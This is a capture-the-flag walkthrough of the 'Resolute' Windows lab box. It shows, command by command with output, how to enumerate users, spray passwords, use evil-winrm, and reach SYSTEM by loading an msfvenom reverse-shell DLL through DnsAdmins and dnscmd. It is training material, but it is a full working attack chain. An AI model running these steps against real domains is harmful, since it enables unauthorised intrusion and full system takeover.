Full nmap scan

nmap -A -p- -o nmap.all.tcp
  • A - enable OS, version and script detection (-sV, -sC, -O)
  • p- - test all ports

53/tcp    open  tcpwrapped
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-18 12:10:06Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49709/tcp open  msrpc        Microsoft Windows RPC
54295/tcp open  tcpwrapped


Due to a poorly configured rpc, we can use rpcclient to connect to the machine using a blank username

rpcclient -U ""
rpcclient $> 
  • U - username

We can then run “enumdomusers” to enumerate the users

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

Using ldapsearch I was able to enumerate users and grep for passwords

ldapsearch -h -x -b "DC=megabank,DC=local" '(objectClass=person)'| grep -i pass
  • h - host
  • x - Simple Authentication
  • b - base dn for search

We can then pipe that into grep


badPasswordTime: 0
description: Account created. Password set to Welcome123!
badPasswordTime: 132345217418993102
badPasswordTime: 0


Ldapsearch can also be used to enumerate usernames

ldapsearch -h -x -b "DC=megabank,DC=local" '(objectClass=person)'| grep -i sAMAccountName

We can then pipe that into grep

sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: RESOLUTE$
sAMAccountName: MS02$
sAMAccountName: ryan
sAMAccountName: marko
sAMAccountName: sunita
sAMAccountName: abigail
sAMAccountName: marcus
sAMAccountName: sally
sAMAccountName: fred
sAMAccountName: angela
sAMAccountName: felicia
sAMAccountName: gustavo
sAMAccountName: ulf
sAMAccountName: stevie
sAMAccountName: claire
sAMAccountName: paulo
sAMAccountName: steve
sAMAccountName: annette
sAMAccountName: annika
sAMAccountName: per
sAMAccountName: claude
sAMAccountName: melanie
sAMAccountName: zach
sAMAccountName: simon
sAMAccountName: naoki

Generate a file with that list of users

cat users

Use crackmapexec to test the accounts found in using rpcclient or ldapsearch with the password of “Welcome123!”

crackmapexec smb -u users -p Welcome123!

We get output


SMB    445    RESOLUTE         [-] MEGABANK\claude:Welcome123! STATUS_LOGON_FAILURE
SMB    445    RESOLUTE         [+] MEGABANK\melanie:Welcome123!

Initial Foothold

Now we have the assumed credentials of user “melanie” which we can use to authenticate to the server using winrm

We can use the credentials with the evil-winrm tool (https://github.com/Hackplayers/evil-winrm)

evil-winrm -u melanie -p Welcome123! -i

With this we get a shell!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie> whoami

And we can grab the user flag

*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt

Privilege Escalation 1

Enumerate the users on the box

*Evil-WinRM* PS C:\Users\melanie\Desktop> net user

User accounts for \\

abigail                  Administrator            angela
annette                  annika                   claire
claude                   DefaultAccount           felicia
fred                     Guest                    gustavo
krbtgt                   marcus                   marko
melanie                  naoki                    paulo
per                      ryan                     sally
simon                    steve                    stevie
sunita                   ulf                      zach
The command completed with one or more errors.

We can also see what users have logged onto the machine

*Evil-WinRM* PS C:\Users> ls

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        9/27/2019   7:05 AM                ryan

Viewing our group permissions we can see we don’t have any access to anything special

*Evil-WinRM* PS C:\Users> net user melanie
User name                    melanie
Full Name
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/21/2020 5:39:04 AM
Password expires             Never
Password changeable          5/22/2020 5:39:04 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

Looking for hidden files in the C: drive we can find a PSTranscripts folder

*Evil-WinRM* PS C:\> ls -h

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/20/2020   9:26 PM      402653184 pagefile.sys

After going into a few more hidden folders we find a PowerShell Transcript file (PowerShell Transcript files record all the activities in the PowerShell console to a text file)

*Evil-WinRM* PS C:\PStranscripts\20191203> ls -h

    Directory: C:\PStranscripts\20191203

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

In this text file we find credentials for a “ryan” user


PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!


We can now login using evil-winrm with ryan

evil-winrm -u ryan -p Serv3r4Admin4cc123! -i

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents>

We don’t find a flag but we do find this note

*Evil-WinRM* PS C:\Users\ryan\Desktop> cat note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

Running whoami /all as ryan tells us that we’re apart of the DNSAdmins group

C:\Users\ryan\Documents> whoami /all

MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


Searching about DNSAdmin, I found this privesc post - https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2

Constructing the msfvenom payload

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST= LPORT=4444 -f dll > privesc.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes

We can then host this using impacket-smbserver

impacket-smbserver exploit ./

You can test the server by using net view

net view \\\exploit
net.exe : The Server service is not started.
    + CategoryInfo          : NotSpecified: (The Server service is not started.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

More help is available by typing NET HELPMSG 2114.

But you may get this error, as long as you see the incoming connection on your smbserver, it all works

[*] Incoming connection (,50789)
[*] User RESOLUTE\ authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:EXPLOIT)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (,50789)
[*] Remaining connections []

Set up your netcat listener

nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on

Now the next few steps involve you to have quick hands as the settings are reset every minute, the easiest way I found was to have already typed all the commands and just use the arrow keys to go through your history to get through them quickly

Run the dnscmd (don’t be worried if you don’t see anything contact your smbserver, it’s not meant to until you restart dns)

dnscmd resolute.megabank.local /config /serverlevelplugindll \\\exploit\privesc.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

Check that the dll has appeared in the registry

Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

ServerLevelPluginDll : \\\SHARE\exploit.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry

Stop and start dns

sc.exe stop dns

        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

sc.exe start dns

        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 576
        FLAGS              :

We should now see something connect to the smbserver and recieve a reverse shell on the listener

Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

nt authority\system

And we’ve got a shell!

C:\Users\Administrator\Desktop>type root.txt
type root.txt